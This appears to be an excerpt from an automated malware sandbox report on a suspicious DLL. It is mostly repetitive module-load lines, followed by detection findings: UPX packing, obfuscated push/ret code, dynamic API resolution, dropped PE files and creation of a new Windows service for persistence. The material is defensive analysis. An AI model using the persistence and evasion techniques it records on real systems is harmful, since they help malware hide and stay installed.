Source: C:\Windows\System32\svchost.exe Section loaded: ztrace_maps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mapconfiguration.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostservice.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: networkhelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdataplatformhelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: syncutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccspal.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcfgutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmcmnutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dmxmlhelputils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: inproclogger.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.networking.connectivity.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: synccontroller.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pimstore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: aphostclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: accountaccessor.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: systemeventsbrokerclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatalanguageutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mccsengineshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cemapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userdatatypehelperutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: phoneutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: w32time.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vmictimeprovider.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bcd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: storageusage.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usosvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: updatepolicy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usocoreps.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usoapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: anuwhqTXGt.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: anuwhqTXGt.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: d:\Projects\Visual Studio\NSIS Plugins\IpConfig\Output\Unicode\Plugins\IpConfig.pdb$ source: IpConfig.dll.15.dr, IpConfig.dll.6.dr, IpConfig.dll.7.dr
Source: Binary string: t:\untgz\MoreInfo\SRC\Release\MoreInfo.pdb source: MoreInfo.dll.7.dr, MoreInfo.dll.15.dr, MoreInfo.dll.6.dr
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: anuwhqTXGt.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9431090 VirtualAlloc,VirtualProtect,LoadLibraryA,GetProcAddress, 33_2_0000021BD9431090
PE file contains sections with non-standard names
Source: fbegbhf.dll.7.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A4F90 push 00000004h; ret 6_2_046A4FFC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A500D push 00000004h; iretd 6_2_046A5014
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B48F3 push ecx; ret 6_2_046B4906
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D28AD push esi; ret 6_2_046D28B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_6D4C0C04 push E800003Ah; ret 6_2_6D4C0C09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_045F48F3 push ecx; ret 7_2_045F4906
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_046128AD push esi; ret 7_2_046128B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034648F3 push ecx; ret 15_2_03464906
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_034828AD push esi; ret 15_2_034828B6
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD944DD7D push rcx; retf 003Fh 33_2_0000021BD944DD7E
Source: C:\Windows\System32\rundll32.exe Code function: 34_2_00000166D886DD7D push rcx; retf 003Fh 34_2_00000166D886DD7E
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C67001ED push rcx; retf 003Fh 39_2_000001C9C67001EE
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: reg.exe Jump to behavior
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\MoreInfo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\md5dll.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Program Files (x86)\Wimsys\uninstall.exe Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\SimpleSC.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\System.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\MoreInfo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Program Files (x86)\Wimsys\msg.exe Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\IpConfig.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\wss_tmp\cr_ws_2.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\IpConfig.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\inetc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\System.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\Public\fbe\fbegbhf.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\MoreInfo.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\md5dll.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\SimpleSC.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\inetc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\System.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\IpConfig.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\nsExec.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\md5dll.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nsqF009.tmp\SimpleSC.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nssF49D.tmp\inetc.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\nszFA3A.tmp\nsExec.dll Jump to dropped file
Creates or modifies windows services
Source: C:\Windows\SysWOW64\rundll32.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\b0ce0805d069128c445841c673b20d15 Jump to behavior
Modifies existing windows services
Source: C:\Windows\System32\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config Jump to behavior
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD9773160 OpenSCManagerA,OpenServiceW,QueryServiceStatusEx,StartServiceA,CloseServiceHandle,CloseServiceHandle, 33_2_0000021BD9773160
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97922AC EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 33_2_0000021BD97922AC
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
